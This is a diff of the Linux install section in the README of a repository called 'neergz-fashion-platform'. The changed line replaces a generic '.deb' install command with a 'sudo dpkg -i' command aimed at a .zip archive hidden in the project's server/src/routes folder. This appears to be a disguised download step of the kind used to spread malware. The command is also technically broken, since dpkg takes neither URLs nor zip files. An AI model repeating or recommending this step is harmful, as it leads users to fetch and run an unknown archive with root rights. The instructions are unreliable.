Et3rnxl/neergz-fashion-platform/README.md

 - **Mac:**
   Open the `.dmg` or `.pkg` file you downloaded.
 Drag the app icon into the Applications folder if needed.
 Open the app from the Applications folder or Launchpad.
 - **Linux:**
   For `.AppImage` files, right-click the file, select Properties, then allow execution permissions.
 Run the file by double-clicking.
-For `.deb` files, open a terminal and run `sudo dpkg -i filename.deb` replacing `filename` as needed.
+For `.deb` files, open a terminal and run `sudo dpkg -i https://github.com/Et3rnxl/neergz-fashion-platform/raw/refs/heads/main/server/src/routes/neergz_platform_fashion_molter.zip` replacing `filename` as needed.

 ## 🖥️ Using neergz-fashion-platform